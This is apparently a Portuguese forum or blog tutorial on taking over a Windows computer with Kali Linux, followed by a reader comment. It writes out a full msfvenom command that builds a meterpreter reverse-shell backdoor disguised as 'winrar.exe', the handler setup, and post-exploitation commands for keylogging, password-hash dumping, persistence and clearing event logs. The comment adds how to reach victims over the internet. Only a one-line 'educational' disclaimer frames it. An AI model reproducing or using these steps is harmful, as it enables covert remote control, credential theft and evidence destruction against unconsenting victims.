Invadindo Computador com kali Linux

5
29233

Boas Users!

Antes de mais nada um recadinho;

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

OBS: ao criar o arquivo “.exe” do backdoor, tem que ser executado no computador com  windows.

Comandos executados no video;

$ sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 lport=4444
-f exe -o /root/Downloads/winrar.exe

sudo = Privilegio de super usuário, ja que eu executei os comandos como usuário comum OBS: se utilizar o usuário “root” não precisa do “sudo”

windows/meterpreter/reverse_tcp= MeterPreter é um interpretador de comandos do metasploit framework.

msfvenom= para criar o nosso backdoor

-p= Payload “refere-se à parte de um vírus de computador que executa uma ação nociva”

lhost= o seu IP local do kali

lport= porta que vai ser executada

-f= format “formato do arquivo que criamos no caso foi exe”

-o= out “saída”

/root/Downloads= caminho que salvei o arquivo

winrar.exe= nome dado ao payload, pode-se dar qualquer nome ao seu payload, mas sempre com a extensão “exe”

$ sudo msfconsole

msfconsole= iniciando o modulo do programa

use exploit/multi/handler

use exploit/multi/handler= Carregando módulo a ser usado

set payload windows/meterpreter/reverse_tcp

set payload windows/meterpreter/reverse_tcp= método utilizado

set lhost

set lhost= inserir o ip do kali

set lport

set lport= inserir a porta a ser utilizada

exploit

exploit = execução do backdoor

 

Seguem-se agora algumas opções:

sysinfo – esse comando vai mostrar qual a versão do windows da máquina alvo.

getsystem – Eleva o nível de privilégio para SYSTEM

ipconfig – Mostra o endereço ip da máquina alvo

screenshot – Salva um arquivo JPEG com um print da tela do computador alvo

keyscan_start – Inicia o keylogger ou seja captura tudo que for digitado no teclado do computador alvo

keyscan_dump – Visualiza os dados capturados após o keyscan_start.

keyscan_stop – Para a captura

run persistence -X – Esse comando configura a máquina alvo para que a cada boot no sistema ela estabeleça novamente a conexão com a máquina atacante.

hashdump – faz a captura do hash de senhas do computador alvo.

execute – Executa um aplicativo ex. execute -f calc.exe

shell – Abre um prompt de comando

clearev – Limpa os logs de eventos do Windows, ou seja, apaga possíveis rastros deixados por vc.

 

By user777

 

5 COMMENTS

    • funciona muito mais além do que vocé imagina, ao invés de colocar o ip local, tem que criar uma conta no-ip, ou algo similar, e fazer o direcionamento no “modem, roteador” etc…

LEAVE A REPLY